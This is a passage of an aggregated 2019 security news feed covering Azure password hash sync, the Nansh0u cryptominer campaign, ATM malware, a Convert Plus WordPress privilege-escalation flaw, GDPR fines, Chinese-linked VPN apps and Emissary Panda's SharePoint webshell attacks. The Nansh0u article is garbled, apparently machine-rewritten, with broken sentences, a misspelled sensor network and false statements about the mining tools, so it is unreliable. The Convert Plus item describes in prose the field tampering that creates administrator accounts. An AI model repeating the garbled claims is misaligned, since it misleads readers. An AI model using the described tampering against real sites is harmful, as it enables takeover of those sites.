  • Microsoft Leaked Credentials Service acquires username/password pairs by monitoring public web sites and the Dark Web and by working with:
    • Researchers
    • Law enforcement
    • Microsoft Security teams
    • Other trusted sources

When the service acquires username/password pairs, the passwords are sent through the same hashing algorithm and are checked against Azure AD users’ password hashes. When a match is found (indicating a compromised credential), a “Leaked Credentials Risk Event” is created. Please see Azure AD Risk Events for additional information regarding Leaked Credentials.

Another important benefit to PHS is that, should your tenant experience a Denial of Service (DoS) and/or Password Spray attack, Microsoft will take the brunt of that traffic. That traffic is directed at Microsoft, not your on-premises Active Directory Federated Services (AD FS). When authentication happens via on-premises AD FS your server is responsible for managing the load and potentially causing downtime.

Moving an organization’s identity management provider to Azure AD and utilizing Password Hash Sync allows for both an increase in overall security posture and reduced management overhead. The security benefits, including leaked credentials, IP lockout, and Smart Lockout, all utilize Microsoft’s telemetry that gives organizations the power of Microsoft’s intelligence.

NOTE: If PHS is the secondary authentication method and, if you choose to take advantage of Smart Lockout and IP Lockout, the primary authentication method must support these functionalities. PHS is recommended as secondary in a hybrid environment if Federated or Pass-through Authentication is primary as a redundancy mechanism, as well as the ability to collect information for Leaked Credentials.

Learn more

To learn more about DART, our engagements, and how they are delivered by experienced cybersecurity professionals who devote 100 percent of their time to providing cybersecurity solutions to customers worldwide, please contact your account executive. Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Read DART: the Microsoft cybersecurity team we hope you never meet for more about the DART team.

The post Demystifying Password Hash Sync appeared first on Microsoft Security.

Nansh0u Miner Attack 50000 MS-SQL, PHPMyAdmin Servers

Chinese hackers and secretly exploited more than 50,000 MS-SQL and PHPMyAdmin for TurtleCoin as part of a large-scale crypto hacking campaign called Nansh0u.

The campaign was discovered in early April and began on 26 February. It focused on servers around the world, including companies from different sectors, with more than 700 victims a day.

According to the Guardicore Labs team which discovered the attacks, “During our investigation, we found 20 versions of malicious payloads, with new payloads created at least once a week and used immediately after their creation time,” and the hackers used “five attack servers and six connect-back servers”.

The Guardicore Labs team attributed this campaign to Chinese operators using multiple indices:

To put the Windows MS-SQL and PHPMyAdmin servers at risk, hackers have used a variety of tools, including a port scanner, an MS SQL brute force tool and a remote execution engine.

With the help of port scanner, they were able to find MS SQL servers by checking the default MS SQL ports were open. These servers would automatically be integrated into the brute force tool, which would attempt to hack the servers with thousands of frequently used credentials.

Once they breach the servers, the Nansh0u campaign operators infect them with 20 different versions of malicious data using an MS-SQL script that downloads and sends user data to vulnerable computers. An elevation of the privilege vulnerability CVE-2014-4113 has been exploited to execute payloads using SYSTEM privileges on infected servers, with each payload eliminated and executed designed as a wrapper for the execution of multiple actions.

As Guardicore researchers noted after analyzing the samples collected through the Global Guardianore sensor network (GGSN) from the attack servers, the wrappers revealed the following:

• Execute the crypto-currency miner;
• Create persistency by writing registry run-keys;
• Protect the miner process from termination using a kernel-mode rootkit;
• Ensure the miner’s continuous execution using a watchdog mechanism.

XMRig and JCE cryptocurrency companies use four data mining pools for TurtleCoin, a confidentiality-oriented cryptocurrency with fast transactions and with all private transactions, provided they are not for public.

Many of the remaining servers on infected user data have also been dropped a kernel mode driver with random names and masked VMProtect code that is not recognized by most AV engines.

The driver also signed a revoked by Verisign certificate from a Chinese company called Hangzhou Hootian Network Technology. It is to “protect processes and prevent the user from closing.

Kernel-mode driver digital signature
It also “contains additional rootkit functionality such as communicating with physical hardware devices and modifying internal Windows process objects that are unused by this particular malware.”

In addition, the kernel-mode driver, which ensures that the remote malware is not interrupted virtually all Windows versions from Windows 7 to Windows 10, including the beta versions support it.

The Guardicore Labs team provides a full list of IOC for this campaign encryption available, including Payload hashes, IP addresses used in attacks and pull Pool domains.

In addition, a PowerShell script is provided. Nansh0u campaign can be viewed on infected computers with the potential for a contaminated server to be traced.

The post Nansh0u Miner Attack 50000 MS-SQL, PHPMyAdmin Servers appeared first on .

TrustArc at European Data Protection Summit

Data Protection World Forum will launch a new event for 2019, The European Data Protection Summit & Dinner which takes place next week on 3rd June, 2019 at a newly launched state-of-the-art event suite at 133 Houndsditch, London. This one-day event is designed to tackle the latest issues, challenges and developments that data protection, privacy and security professionals are facing in 2019. In the evening the summit will transform into an evening-dinner where attendees will be able to enjoy a drinks reception, three-course meal, networking and entertainment. The European Data Protection Summit & Dinner will bring together an international line-up … Continue reading TrustArc at European Data Protection Summit

The post TrustArc at European Data Protection Summit appeared first on TrustArc Blog.

Fraudulent Academic Papers

The term "fake news" has lost much of its meaning, but it describes a real and dangerous Internet trend. Because it's hard for many people to differentiate a real news site from a fraudulent one, they can be hoodwinked by fictitious news stories pretending to be real. The result is that otherwise reasonable people believe lies.

The trends fostering fake news are more general, though, and we need to start thinking about how it could affect different areas of our lives. In particular, I worry about how it will affect academia. In addition to fake news, I worry about fake research.

An example of this seems to have happened recently in the cryptography field. SIMON is a block cipher designed by the National Security Agency (NSA) and made public in 2013. It's a general design optimized for hardware implementation, with a variety of block sizes and key lengths. Academic cryptanalysts have been trying to break the cipher since then, with some pretty good results, although the NSA's specified parameters are still immune to attack. Last week, a paper appeared on the International Association for Cryptologic Research (IACR) ePrint archive purporting to demonstrate a much more effective break of SIMON, one that would affect actual implementations. The paper was sufficiently weird, the authors sufficiently unknown and the details of the attack sufficiently absent, that the editors took it down a few days later. No harm done in the end.

In recent years, there has been a push to speed up the process of disseminating research results. Instead of the laborious process of academic publication, researchers have turned to faster online publishing processes, preprint servers, and simply posting research results. The IACR ePrint archive is one of those alternatives. This has all sorts of benefits, but one of the casualties is the process of peer review. As flawed as that process is, it does help ensure the accuracy of results. (Of course, bad papers can still make it through the process. We're still dealing with the aftermath of a flawed, and now retracted, Lancet paper linking vaccines with autism.)

Like the news business, academic publishing is subject to abuse. We can only speculate the motivations of the three people who are listed as authors on the SIMON paper, but you can easily imagine better-executed and more nefarious scenarios. In a world of competitive research, one group might publish a fake result to throw other researchers off the trail. It might be a company trying to gain an advantage over a potential competitor, or even a country trying to gain an advantage over another country.

Reverting to a slower and more accurate system isn't the answer; the world is just moving too fast for that. We need to recognize that fictitious research results can now easily be injected into our academic publication system, and tune our skepticism meters accordingly.

This essay previously appeared on

10 years of virtual dynamite: A high-level retrospective of ATM malware

It has been 10 years since the discovery of Skimer, first malware specifically designed to attack automated teller machines (ATMs). At the time, the learning curve for understanding its functionality was rather steep and analysis required specific knowledge of a manufacturer’s ATM API functions and parameters, which were not publicly documented.

Before the discovery of Skimer, anti-malware researchers’ considered ATMs secure machines containing proprietary hardware, running non-standard operating systems, and implementing a number of advanced protection techniques designed to prevent attacks using malicious code. Researchers eventually discovered that the most popular ATM manufacturers use a standard Windows operating system and add on some auxiliary devices, such as a safe and card reader.

Over time, actors behind some of the newer ATM malware families such as GreenDispenser and Tyupkin realized that there is a generic Windows extension for Financial Services API (CEN/XFS) that can be used to make malware that runs independent of the underlying hardware platform, as long as the ATM manufacturer supports the framework. This malware can trick the machines into dispensing cash, regardless of whether the attacker has a legitimate bank card.

Over time, ATM malware has evolved to include a number of different families and different actors behind them, ranging from criminal groups to actors affiliated with nation states. The significance of ATM malware stems from the fact that it can bring significant financial benefits to attackers and as a consequence cause a significant damage to targeted banks, financial institutions and end users.

Now that this type of malware has been around for more than 10 years, we wanted to round up the specific families we’ve seen during that time and attempt to find out if the different families share any code.


The post 10 years of virtual dynamite: A high-level retrospective of ATM malware appeared first on Cisco Blog.

7 proven ways to accelerate your ISO 27001 project

ISO 27001 compliance

  1. Do your research

Ditch the jargon and learn how to implement an ISMS (information security management system) in nine steps with our free guide. We’ve also got a handy pocket guide – Nine Steps to Success – An ISO 27001 Implementation Overview – that explains (in layman’s terms) how to develop and deploy an ISMS.

  1. Read the Standard

ISO/IEC 27001:2013 sets out the basic elements of an ISMS. For your project to be a success, it’s important to get your head around the details and understand what the Standard is all about. This might take time, but you’ll be going in blind without such knowledge.

  1. Learn from the experts

ISO 27001 certification

We’re no strangers to ISO 27001: our directors pioneered the world’s first ISMS certification project and we’ve helped hundreds of organisations prepare for and achieve certification to ISO 27001, so we know a thing or two about what it takes to succeed!

Learn how to put theory into practice by attending one of our ISO 27001 training courses. Available in a variety of formats, all of our courses have been designed by experts and are delivered by experienced trainers.

  1. Ditch the spreadsheets

When it comes to risk assessments, spreadsheets simply won’t cut it; a ‘one size fits all’ approach can’t accurately identify all the threats and vulnerabilities that could affect your organisation.

Get it right first time with risk assessment software designed to guide you through the entire risk assessment process. vsRisk™ includes a list of built-in threats and vulnerabilities for guidance and provides a set of required, auditable reports.

  1. Don’t try to reinvent the wheel

It might be hard to believe, but even consultants use pre-formatted templates for implementation projects. Rather than starting from scratch, save time and money and keep your project on track with our ISO 27001 documentation toolkit. Packed with policy templates, guidance and project management tools, it has helped more than 3,000 organisations to date.

  1. Train your staff

ISO 27001 staff training

Staff awareness training is critical to minimise errors and infractions caused by poorly informed employees. E-learning is quick, user-friendly, trackable and affordable, and because the results are automatically stored, you can pull them up whenever an auditor asks for them. Get your staff familiar with information security and ISO 27001 with our popular e-learning course.

  1. Phone a friend

If you need more support with your project, we offer a range of options, with live, online consultancy support, including our popular ISO 27001 implementation bundles, available for as little as £200 an hour. We also offer bespoke consultancy if you need more help.

Acquire all the knowledge you need to implement an ISMS with our ISO27001 Get A Little Help Package. This package consists of tried and trusted tools and resources that will help you simplify your ISMS project deliverables and achieve certification faster.

Save £653 when you purchase this bundle online!

Buy now >>

The post 7 proven ways to accelerate your ISO 27001 project appeared first on IT Governance Blog.

Episode 503 – GitHub Releases Several Security Tools To Help Developers

GitHub is continuing to expand their security offerings to help developers create the most secreapplications possible.  This episode talks about the latest new security tools from GitHub. Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security In Five Don’t forget to subscribe to the Security In Five […]

The post Episode 503 – GitHub Releases Several Security Tools To Help Developers appeared first on Security In Five.

Convert Plus WordPress plugin flaw allows hackers to create Admin accounts

The WordPress plugin Convert Plus is affected by a critical flaw that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.

The WordPress plugin Convert Plus is affected by a critical vulnerability that could be exploited by an unauthenticated attacker to create accounts with administrator privileges.

Convert Plus plugin

A vulnerability ties with the lack of filtering when processing a new user subscription via a form implemented by the Convert Plus plugin that already has more than 100,000 active installations,

Convert Plus aims at generating more subscribers and sales conversions using popups, header & footer bars, slide-in forms, sidebar widgets, in-line forms, and social buttons.

New subscribers can use a specific form that allows them to define the role they want, of course, administrator accounts are not in the list of possible options og a drop-down menu.

Experts at Defiant discovered that Convert Plus plugin includes an administrator role in a hidden field called “cp_set_user.” Experts pointed out that the value for this field could be supplied by the same HTTP request as the rest of the subscription entry, and users can modify it.

“However, in vulnerable versions of the plugin, this intended user role wasn’t fetched from the database on submission. Instead, this setting was reflected in a hidden field on the plugin’s forms called cp_set_user.” reads the analysis by the experts. “Because this value is supplied by the same HTTP request as the rest of the subscription entry, it can be modified by the user.”

It could very easy for an attacker to submit a subscription form and modify the value of the “cp_set_user” by setting the “administrator” value to create a new admin user.

“This code calls the plugin’s function cp_add_new_user_role with the role provided in the AJAX request, which then handles the process of creating the user as directed.” continues the analysis.

“Since no filtering is applied when this new subscription is processed, if an attacker submits a subscription form and changes the value of cp_set_user to “administrator”, the plugin will create an administrator user associated with the given email address.”

The hack allows to create a new admin account with a randomized password, but it is not a problem because the attacker can use a classic password reset procedure to change the password too.

The vulnerability affects all versions of the Convert Plus plugin up to 3.4.2., it is essential for administrators to update their install to the version 3.4.3.

Defiant experts also published a video PoC for the exploitation of the issue.

Below the disclosure timeline of the vulnerability:

  • May 24 – Vulnerability discovered. Notified developers privately.
  • May 28 – Patch released by developers. Firewall rule released for Premium users.
  • June 27 – Planned date for firewall rule’s release to Free users.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Convert Plus plugin, hacking)

The post Convert Plus WordPress plugin flaw allows hackers to create Admin accounts appeared first on Security Affairs.

Report: 50% Increase in Exposed Data in One Year

Report: 50% Increase in Exposed Data in One Year

New research released by digital risk protection specialists Digital Shadows has revealed a 50% increase in exposed data in the last year.

In its report Too Much Information: The Sequel from its Photon Research Team, Digital Shadows discovered that misconfiguration of commonly used file storage technologies was largely to blame for the exposure of 2.3 billion online files in one year. That is a jump of more than 750 million files since the same study was carried out by Digital Shadows in 2018.

Almost half of the files were exposed via the server message block protocol, whilst other technologies such as FTP services (20%), rsync (16%), Amazon S3 ‘buckets’ (8%) and network storage devices (3%) were also cited by Digital Shadows as sources of exposure.

Speaking to Infosecurity Harrison Van Riper, Photon Research analyst at Digital Shadows, said: “It is surprising to see such a large increase in such a short amount of time, indicating that the issue of inadvertent data exposure is not one to be taken lightly.”

However, it is not just the sheer amount of data exposed in the last 12 months or even the means by which it was that causes concern, as the sensitivity of the exposed data is also a significant issue. Digital Shadows warned that with exposed data including passport details, bank records, medical and business information, organizations and individual consumers are at greater risk of GDPR punishments, targeted business compromise, identity theft and ransomware attacks.

“Every day, there are new files being exposed that are potentially sensitive personal or private information for businesses and consumers alike,” Van Riper added. “Our research shows that in a GDPR world, the implications of inadvertently exposed data are even more significant. Countries within the European Union are collectively exposing over one billion files – nearly 50% of the total we looked at globally – some 262 million more than when we looked at last year. Some of the data exposure is inexcusable – Microsoft has not supported SMBv1 since 2014, yet many companies still use it. We urge all organizations to regularly audit the configuration of their public facing services.”

What Defines a Machine Learning-Based Threat Intelligence Platform?

Reading Time: ~ 4 min.

As technology continues to evolve, several trends are staying consistent. First, the volume of data is growing exponentially. Second, human analysts can’t hope to keep up—there just aren’t enough of them and they can’t work fast enough. Third, adversarial attacks that target data are also on the rise.

Given these trends, it’s not surprising that an increasing number of tech companies are building or implementing tools that promise automation and tout machine learning and/or artificial intelligence, particularly in the realm of cybersecurity. In this day and age, stopping threats effectively is nearly impossible without some next-generation method of harnessing processing power to bear the burden of analysis. That’s where the concept of a cybersecurity platform built on threat intelligence comes in.

What is a platform?

When you bring together a number of elements in a way that makes the whole greater or more powerful than the sum of its parts, you have the beginnings of a platform. Think of it as an architectural basis for building something greater on top. If built properly, a good platform can support new elements that were never part of the original plan.

With so many layers continually building on top of and alongside one another, you can imagine that a platform needs to be incredibly solid and strong. It has to be able to sustain and reinforce itself so it can support each new piece that is built onto or out of it. Let’s go over some of the traits that a well-architected threat intelligence platform needs

Scale and scalability

A strong platform needs to be able to scale to meet demand for future growth of users, products, functionality. Its size and processing power need to be proportional to the usage needs. If a platform starts out too big too soon, then it’s too expensive to maintain. But if it’s not big enough, then it won’t be able to handle the burden its users impose. That, in turn, will affect the speed, performance, service availability, and overall user experience relating to the platform.

You also need to consider that usage fluctuates, not just over the years, but over different times of day. The platform needs to be robust enough to load balance accordingly, as users come online, go offline, increase and decrease demand, etc.

Modularity can’t be forgotten, either. When you encounter a new type of threat, or just want to add new functionality, you need to be able to plug that new capability into the platform without disrupting existing services. You don’t want to have to worry about rebuilding the whole thing each time you want to add or change a feature. The platform has to be structured in such a way that it will be able to support functionality you haven’t even thought of yet.

Sensing and connection

A threat intelligence platform is really only as good as its data sources. To accurately detect and even predict new security threats, a platform should be able to take data from a variety of sensors and products, then process it through machine learning analysis and threat intelligence engines.

Some of the more traditional sensors are passive, or “honeypots” (i.e. devices that appear to look open to attack, which collect and return threat telemetry when compromised.) Unfortunately, attack methods are now so sophisticated that some can detect the difference between a honeypot and a real-world endpoint, and can adjust their behavior accordingly so as not to expose their methods to threat researchers. For accurate, actionable threat intelligence, the platform needs to gather real-world data from real-world endpoints in the wild.

One of the ways we, in particular, ensure the quality of the data in the Webroot® Platform, is by using each deployment of a Webroot product or service—across our home user, business, and security and network vendor bases—to feed threat telemetry back into the platform for analysis. That means each time a Webroot application is installed on some type of endpoint, or a threat intelligence partner integrates one of our services into a network or security solution, our platform gets stronger and smarter.

Context and analysis

One of the most important features a threat intelligence platform needs is largely invisible to end users: contextual analysis. A strong platform should have the capacity to analyze the relationships between numerous types of internet objects, such as files, apps, URLs, IPs, etc., and determine the level of risk they pose.

It’s no longer enough to determine if a given file is malicious or not. A sort of binary good/bad determination really only gives us a linear view. For example, if a bad file came from an otherwise benign domain that was hijacked temporarily, should we now consider that domain bad? What about all the URLs associated with it, and all the files they host?

For a more accurate picture, we need nuance. We must consider where the bad file came from, which websites or domains it’s associated with and for how long, which other files or applications it might be connected to, etc. It’s these connections that give us a three-dimensional picture of the threat landscape, and that’s what begins to enable predictive protection.

The Bottom Line

When faced with today’s cyberattacks, consumers and organizations alike need cybersecurity solutions that leverage accurate threat telemetry and real-time data from real endpoints and sensors. They need threat intelligence that is continually re-analyzed for the greatest accuracy, by machine learning models that are trained and retrained, which can process data millions of times faster than human analysts, and with the scalability to handle new threats as they emerge. The only way to achieve that is with a comprehensive, integrated machine-learning based platform.

The post What Defines a Machine Learning-Based Threat Intelligence Platform? appeared first on Webroot Blog.

Smashing Security #130: Doctored videos, BCC blunders, and a diva

You won’t believe who had to report themselves to the data protection agency for a breach, or who has been sharing doctored videos of political rivals, or how much money you can make selling a laptop infected with malware… and how Carole gets her diva on.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, who aren’t joined by a guest this week.

Attackers are exploiting WordPress plugin flaw to inject malicious scripts

Attackers are leveraging an easily exploitable bug in the popular WP Live Chat Support plugin to inject a malicious JavaScript in vulnerable sites, Zscaler warns. The company has discovered 47 affected sites (some have been cleaned up in the meantime) but that number is unlikely to be final. The source of the compromise The stored cross-site script vulnerability vulnerability the attackers are exploiting was discovered by Sucuri researchers earlier this year and the plugin developers … More

The post Attackers are exploiting WordPress plugin flaw to inject malicious scripts appeared first on Help Net Security.

Checkers Says Data Breach Affected 100+ Locations

Checkers Drive-In Restaurants, Inc. revealed that a data breach possibly affected customers at more than 100 of its Checkers and Rally’s locations. Adam Noyes, chief administrative officer and executive vice president at Checkers Drive-In Restaurants, Inc., wrote in a statement that the double drive-thru restaurant chain recently learned of a malware infection involving some of […]… Read More

The post Checkers Says Data Breach Affected 100+ Locations appeared first on The State of Security.

Why Your Business Needs Mobile Device Management (MDM)

Mobile Device Management (MDM)

The number of privacy breaches that have hit the headlines has increased in recent years. Many of these disasters are due to the loss or violation of mobile device security. As a result, more than ever IT managers need to find ways to safely manage this device. The average employee expected a BYOD in his company, but the BYOD movement remains a vector of significant attack on the security of the company. IT managers need to find ways to simplify the use of personal devices while ensuring the security of personal and business information.

A few years back, we never thought that a day will come when employees will not have to rely on desktop as the only means to do their work. The wide acceptance of smartphones and digital mobile applications has freed employees from desktops and enabled them to do business outside their offices.

From maintenance time to group chat, access to files in the cloud, working on a mobile device is no longer normal, it is just the norm- business as usual. Although this approach is a productivity advantage, we cannot deny that there are security risks when sensitive business information is put in your pocket. To overcome this risk, it is very important for many companies to have a Mobile Device Management (MDM) system.

To put it in a simple form, MDM enables a company’s IT employees to manage and secure smartphones and tablets remotely. However, the benefits of MDM for the company is not restricted to monitoring mobile devices.

More control and security

An effective MDM system guarantees the protection of company data, e-mails, and confidential documents. If a device is lost or stolen, the administrator can easily lock, disconnect, or lock the mobile device. SIM cards can also be blocked for employees’ mobile devices and if somebody tries to transfer the SIM to another device they will need a PUK code.

MDM offers better control over their devices. For example, a company’s sales employee will not have to register and configure all devices used by their sales agents. Instead, you can configure the device and use the security software automatically. Certain tools and applications can also be sent to agent devices. If you want the app to be configured at start-up or if you want an automatic application or replacement updates throughout the enterprise, you can easily do it manually without having to call the device.

Powerful and Highly Efficient Management

Practically, mobile devices can distract employees. If organizations want to limit or prohibit the use of certain apps on their devices and avoid unnecessary data costs, IT managers can block YouTube, Facebook, or other social media apps. Take, for example, the company’s rescue services. As drivers need to focus on the road, some companies use MDM to prevent them from using other apps than the transport app and Waze or Google Maps while driving. This not only ensures operational efficiency, but also security

Increased flexibility

Working from anywhere with a mobile device gives access to relevant files anytime, anywhere and in any situation. Some tools gives you that luxury, for example, the vendors of the company do not need to download the resources separately from different portals. The centralized MDM system enables more efficient distribution of business documents, such as training forms and learning materials, accessible only to authorized individuals.

Find the right MDM solution

As the businesses focus on productivity, efficiency, and security, and with more and more companies choosing BYOD (Bring your own device), MDM is ready to respond to feature requests that help them take control of the device while providing their employees with freedom, security, and productivity.

Based on their requirements, organizations can choose their device management providers.

Also, Read:

Threat to Mobile Device called Dark Caracal Malware

How Protect Your Android Device From The Mobile Banking Trojan

How to Unlock Your Device with Android Device Manager (ADM)

The post Why Your Business Needs Mobile Device Management (MDM) appeared first on .

Insight Partners acquires Recorded Future for $780 million

Insight Partners has agreed to acquire a controlling interest in Recorded Future. The all-cash transaction values Recorded Future at more than $780 million and will accelerate the next phase of the company’s global growth and expansion. Today, Recorded Future is the largest privately-held threat intelligence software company in the world, with more than 400 clients and adding hundreds of new clients every year across all geographies and sectors onto its SaaS platform. The company has … More

The post Insight Partners acquires Recorded Future for $780 million appeared first on Help Net Security.

G Suite to get Gmail confidential mode, on by default

Earlier this year, Google introduced Gmail confidential mode for both consumer and G Suite users. While the former were able to use it immediately, the latter depended on whether their domain admin chose to enable it (as it was and is still in beta). But, starting on June 25, the feature will be turned on by default and it will be on admins to turn it off – if they don’t explicitly choose to disable … More

The post G Suite to get Gmail confidential mode, on by default appeared first on Help Net Security.

Fines Increase & Enforcements Fall in First Year of GDPR

Fines Increase & Enforcements Fall in First Year of GDPR

Data protection monetary penalties have increased by £2m in the past year, while the number of enforcements issued fell by more than 20 from the number issued in 2017.

According to PwC’s 2018 Privacy & Security Enforcement Tracker, monetary penalties issued to UK organizations for breaching data protection laws in the calendar year 2018 totaled more than £6.5m in 2018, over £2m more than the previous year.

The data also showed that while the total sum of fines has increased, the number of enforcements issued fell to 67 in 2018, from 91 in 2017.

After we marked a year since the deadline for GDPR compliance, the data also showed that private sector companies accounted for 86% of the enforcements, but scrutiny remains on the public sector given the sensitive nature of the data it handles. Also, a quarter (25%) of enforcement actions relate to personal data security breaches.

Stewart Room, lead partner for GDPR and data protection at PwC, said that the trend of enforcement remained constant in comparison with previous years, with marketing and security infringements dominating the regulatory agenda.

“The absence of any GDPR fines in 2018 was not surprising, as it takes many months for cases to work through the system, but we know that they are on their way,” he said. “As well as looking at how to improve their levels of legal compliance, I would encourage organizations to focus on how good approaches to the handling of personal data can help them to deliver on their business purpose, to help and sustain the creation of long term value and trust.”

In an email to Infosecurity, Emma Loveday-Hill, senior associate and data protection specialist at Prettys, said that as monetary penalty notices in the last year were issued under the old legislation (the Data Protection Act 1998), where the maximum fine was £500,000, there were still numerous high level fines issued due to the fact that there were a number of serious breaches.

“In terms of the reduction in enforcement notices, this is likely to be due to the fact that the ICO has been busy dealing with the backlog of complaints and issues brought to their attention since the introduction of the GDPR and DPA 2018,” she said.

“Investigations by their very nature take time to carry out, and given the likely number of the complaints and issues raised with the ICO, this has no doubt had an impact on how quickly enforcement notices are handed down.
“Our message is still very much ‘watch this space’ as the ICO are just getting started in terms of what they are doing under the GDPR and Data Protection Act 2018, and going forward we are likely to see a higher number of enforcement notices and fines coming through over the coming months as the ICO makes its goal for 2019 a clear one: breaches of data protection law will be taken seriously and financial penalties will be issued as a result of noncompliance.”

VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs

Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

Recent research by the cybersecurity experts at VPNpro shows that the popular mobile VPN developer Innovative Connecting is actually a Chinese company that secretly owns 10 VPN products with a total of 86 million installs under its belt.

The study also revealed that two of those VPN products are under its other developer name, Lemon Clove, and another two by Autumn Breeze 2018.

Interestingly, most of the popular mobile-only VPNs that VPNpro analyzed are actually Chinese (run by Chinese nationals or actually located in China). Any data that is held in mainland China is wide open to access by Chinese authorities, confirming US Senators’ recent fears of American data falling into Chinese or Russian hands.

Innovative Connecting VPNs products

Innovative Connecting owns the following 10 VPN products:

  1. VPN Master – Free Proxy
  2. VPN Proxy Master (Pro)
  3. VPN Proxy Master (Lite)
  4. Turbo VPN
  5. Unlimited Free VPN
  6. HOT VPN
  7. Snap VPN
  8. VPN Robot
  9. VPN Sofast
  10. Turbo VPN Private Browser

Source: VPNpro

What is the relationship between Innovative Connecting, Lemon Clove and ALL Connected?

VPNpro’s research reveals that there is a clear relationship between these three companies. Innovative Connecting has more than a strong business relationship with Lemon Clove, which creates the popular Snap VPN and VPN Robot apps.

Lemon Clove and Innovative Connecting share the same secretary, Loo Ping Yoo, and key addresses. Both Lemon Clove’s website and Innovative Connecting’s website are the same, with only small changes in text.

If you search VPN Proxy Master on Apple’s App Store, you can see the developer name appears as ALL Connected, while Innovative Connecting listed as the developer on Google Play.

ALL Connected’s Turbo and Master VPN are on similar Cloudfront domains that link to Innovative Connecting. The App Store policy for VPN Master (developed by Innovative Connecting) is hosted on ALL Connected’s domain. All the policies for these VPN apps have the exact same broken English and typos.

Innovative Connecting’s Director seems to be Danny Chen, the well-known Chinese entrepreneur and CEO behind Linksure. Beyond that, the researchers discovered that the email address used to register (developed by Innovative Connecting) also registered,, and many others.

VPNs 2

Source: VPNpro

Why does it matter if a company owns multiple VPN products?

There is nothing wrong with owning multiple VPN brands – but there must be transparency between the company and its users. Trust is the most important factor for most users of VPN services. Other than this, there are two further crucial issues

1. Privacy

In a recent US survey, 95% of internet users said they were either somewhat concerned or very concerned about their privacy. However, if VPNs are actually located in a 5/9/14 Eyes country, which are normally high-surveillance countries, or in a repressive country like China or Russia, users’ data is most likely already in those governments’ hands.

2. Security

If a VPN’s parent company is untrustworthy, including having weak security or actively engaged in malicious activities, it can be a big problem. This can lead to users’ data being stolen and sold on the black market, or even having their computers hacked into.

Bottom line

There are thousands of VPN companies out there, and unfortunately many of them have weak security and privacy features, or are outright malicious in wanting to steal or sell user data.

To help you find a trustworthy VPN, you should follow these steps below:

  • carefully read the privacy policy of a VPN provider
  • read in-depth reviews of a VPN company on different platforms
  • ask for a recommendations on different communities and see their views
  • check if the company is GDPR compliant
  • read their privacy features
  • check if they have had any scandals or breaches

With the right homework, you can find a trustworthy VPN that actually helps safeguard your online activity.

About The Author: Susan Alexandra is is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor of cryptocurrencies. Susan’s inbox is open for new ideas and stories, you can share the story ideas to susanalexandra67(at)gmail(dot)com

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – VPNs, privacy)

The post VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs appeared first on Security Affairs.

Emissary Panda APT group hit Government Organizations in the Middle East

Chinese Cyber-Spies Target Government Organizations in Middle East

Chinese APT group Emissary Panda has been targeting government organizations in two different countries in the Middle East.

Experts at Palo Alto Networks reported that the Chinese APT group Emissary Panda (aka APT27, TG-3390, Bronze Union, and Lucky Mouse) has been targeting government organizations in two different countries in the Middle East.

The Emissary Panda APT group has been active since 2010, targeted organizations worldwide, including U.S. defense contractors, financial services firms, and a national data center in Central Asia.

Emissary Panda Espionage-r3d1-1024x512

The group was involved in cyber espionage campaigns aimed at new generation weapons and in surveillance activities on dissidents and other civilian groups. 

The cyber espionage group leverage both readily available tools and custom malware in their operations, many tools are available for years, but in recent attacks, their code was updated.

In April 2019, the group targeted organizations of two different countries in the Middle East. Hackers hit webservers to install of webshells on SharePoint servers, threat actors leveraged the CVE-2019-0604 vulnerability to compromise SharePoint servers. 

Once compromised the network, attackers will upload a variety of tools to perform additional activities, including dumping credentials, and locating and pivoting to additional systems on the network.

Experts pointed out that attackers used tools to scan the network for systems vulnerable to CVE-2017-0144, the flaw exploited by the NSA-linked EternalBlue exploit.

The campaign appears related to attacks exploiting CVE-2019-0604 reported by the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security. The report by the Saudi Cyber Security Centre suggests threat actors are primarily targeting organizations within the kingdom. The Canadian Cyber Security Centre reported similar attacks aimed at delivering the China Chopper web-shell to ensure persistence in the target networks.

“the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks. We also found the China Chopper webshell on the SharePoint servers, which has also been used by the Emissary Panda threat group.” states the report published by PaloAlto Networks.a

PaloAlto experts observed between April 1 and April 16, the threat actors-using webshells to upload 24 unique executables on three SharePoint servers hosted by two different government organizations. Experts noticed that the same tools were uploaded across the three webshells, suggesting the involvement of the same attacker. 

The longest activity involving one of the three webshells was observed on April 16, 2019.

The list of the tools uploaded by cyberspies included legitimate applications such as cURL, post-exploitation tools like Mimikatz, tools to scan for and exploit potential vulnerabilities in the target network, and custom backdoors such as HyperBro, which was used by Emissary Panda in the past. 

One of the webshells used by the attackers is a variant of the Antak webshell, other webshells appear related to the China Chopper webshell.

“We were able to gather one of the webshells with which we saw the actor interacting, specifically the error2.aspx file listed above. The error2.aspx file (SHA256: 006569f0a7e501e58fe15a4323eedc08f9865239131b28dc5f95f750b4767b38) is a variant of the Antak webshell, which is part of a tool created for red teaming called Nishang. ” continues the report.

Cyber spies also uncovered the use of additional sideloaded DLLs in this campaign. 

“The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East, which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604,” Palo Alto Networks concludes. 

“Once the adversary established a foothold on the targeted network, they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials, perform network reconnaissance and pivot to other systems.  “

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – cyberespionage, Emissary Panda)

The post Emissary Panda APT group hit Government Organizations in the Middle East appeared first on Security Affairs.

CLB Super Holder Event

